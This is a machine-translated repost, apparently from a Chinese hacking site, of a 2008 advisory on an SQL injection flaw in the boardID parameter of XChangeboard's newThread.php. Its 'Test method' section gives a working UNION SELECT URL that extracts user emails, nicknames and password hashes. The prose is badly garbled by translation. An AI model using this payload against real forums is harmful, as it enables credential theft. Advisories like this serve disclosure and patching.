Home | hacker invade | crack analyzes | hacker course | Exploit | encryption decipher | network management | System crack | the virus to be related | invades the examination | firewall
You are here: hacking technology > System crack > Content
Hot Articles
Mozilla the Firefox 2.0.
The Wireshark 1.0.1 edit
ServerView Web connectio
phpMyAdmin long-distance
DC++ many long-distance
VLC the media player WAV
Wordpress XML-RPC connec
PCRE the pcre_compile.c
BlueZ the SDP load handl
Drupal many input confir
XChangeboard newThread.p
Panda the ActiveScan lon
1024 CMS many documents
WeFi journal file local
vBulletin adminlog.php r
Recommend Articles
Mozilla the Firefox 2.0.
DC++ many long-distance
VLC the media player WAV
The Wireshark 1.0.1 edit
Wordpress XML-RPC connec
ServerView Web connectio
PCRE the pcre_compile.c
phpMyAdmin long-distance
Panda the ActiveScan lon
BlueZ the SDP load handl
1024 CMS many documents
WeFi journal file local
vBulletin adminlog.php r
Microsoft Windows DNS se
Adobe RoboHelp Server he
New Articles
BlueZ the SDP load handl
Microsoft Access snapsho
Panda the ActiveScan lon
Youngzsoft CMailServer l
Poppler PDF an exaggerat
phpMyAdmin long-distance
Wordpress XML-RPC connec
The Opera 9.51 editions
XChangeboard newThread.p
GraphicsMagick many refu
Mac the OS X system 2008
Microsoft the IE frame p
VLC the media player WAV
DC++ many long-distance
How the homepage “does
XChangeboard newThread.php document SQL pours into the crack
  Add date: 07/25/2008   Publishing date: 07/25/2008   Hits: 3

Is affected the system:
Henrik Brinkmann XChangeboard 1.75 Beta
Henrik Brinkmann XChangeboard 1.70

Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 30059

Xchangeboard is based on PHP and the MySQL notice board solution.

In the Xchangeboard newThread.php document has not confirmed correctly to the boardID parameter input then uses in the SQL inquiry, this permission long-distance aggressor carries out SQL through the submission evil intention's inquiry request to pour into the attack.

<* origin: haZl0oh
 
  Link: http://secunia.com/advisories/30919/
*>

Test method:
--------------------------------------------------------------------------------

Warning

The following procedure (method) possibly has the aggressivity, only supplies the safe research and teaching. The user risk is proud!

http://site.com/path/newThread.php?boardID=+999999%20union%20select%20email,concat_ws(0x3a,nick,substring(password,1,100)),email,email,email%20from%20user/*

Suggested:
--------------------------------------------------------------------------------
Manufacturer patch:

Henrik Brinkmann
----------------
At present the manufacturer has not provided the patch or the promotion procedure, we suggested that uses this software's user momentarily to pay attention to the manufacturer the main page to gain the newest edition:

http://www.xchangeboard.de/
Prev:GraphicsMagick many refuse to serve the crack Next:The Opera 9.51 editions repair many security cracks

Comment:

Category: Home > System crack
Home